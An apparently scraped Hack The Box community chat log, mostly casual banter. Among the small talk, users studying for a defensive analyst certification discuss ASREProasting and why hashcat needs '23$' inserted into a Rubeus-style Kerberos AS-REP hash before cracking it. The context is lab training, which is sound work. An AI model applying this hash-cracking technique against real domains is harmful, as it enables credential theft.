
#

i'm going in

#

pray for me

supple plume
#
head /usr/share/seclists/Miscellaneous/List-Of-Swear-Words/en.txt -n281 | tail -n1
mystic harbor
supple plume
#

if you use wordlists you still have [REDACTED] in your computer

zealous charm
lofty warren
heady sage
#

Very proud of you

lofty warren
lofty warren
undone fossil
#

I will give him extra pets the next time I see him

knotty oar
#

Hello folx!

undone fossil
#

Good frogs

knotty oar
#

How's everyone doing today?

#

I don't understand I'm just trying to be friendly

scenic maple
#

u?

scenic maple
knotty oar
scenic maple
#

welcome to htb

knotty oar
knotty oar
sturdy thistle
undone fossil
#

Imagine being briish

molten bobcat
#

im not a fan of managing multiple rdp windows

static pasture
undone fossil
#

Ye kinda it’s a weird form of ration actually

molten bobcat
#

heya sir

#

im studying again

static pasture
#

Yo

undone fossil
#

Studying for?

molten bobcat
#

CDSA

#

plan on taking it

undone fossil
#

Like general learning or anything I. Particular

#

Ohh

molten bobcat
#

so current subject is understanding windows attacks

#

at the moment its ASREProasting

undone fossil
#

Nice prayge

molten bobcat
#

the CDSA is pretty nice content wise

#

they make you commit the attack

#

and then review the logs that attack typically generates

undone fossil
#

Ye it’s basically a practice lab right

#

Learning Kerberos and smb will be super useful though

molten bobcat
#

got a question you might be able to answer about hashcat

undone fossil
#

E.g. Kerberos ticket flags are a core IoC in the impacket example scripts

#

Ye

ornate ibex
molten bobcat
#
For hashcat to be able to recognize the hash, we need to edit it by adding 23$ after $krb5asrep$:
#

Why do we do this? it doesn't explain why

undone fossil
#

Because that’s the format on the hashcat wiki

molten bobcat
#

i know this is a tangent but

#

why

#

that format

#

instead of what it comes as

undone fossil
molten bobcat
#

is this just from how rubeus outputs it or..?

undone fossil
#

Yes

scenic maple
undone fossil
#

Also chat what food do I get from the shop

#

Gonna go soon

ornate ibex
#

completed 35.48% in the path

#

should complete two or three modules tomw

undone fossil
#

Honestly if I could skip the β€œpaths” I’d do Htb exams

scenic maple
#

dont u get stuck on assesments?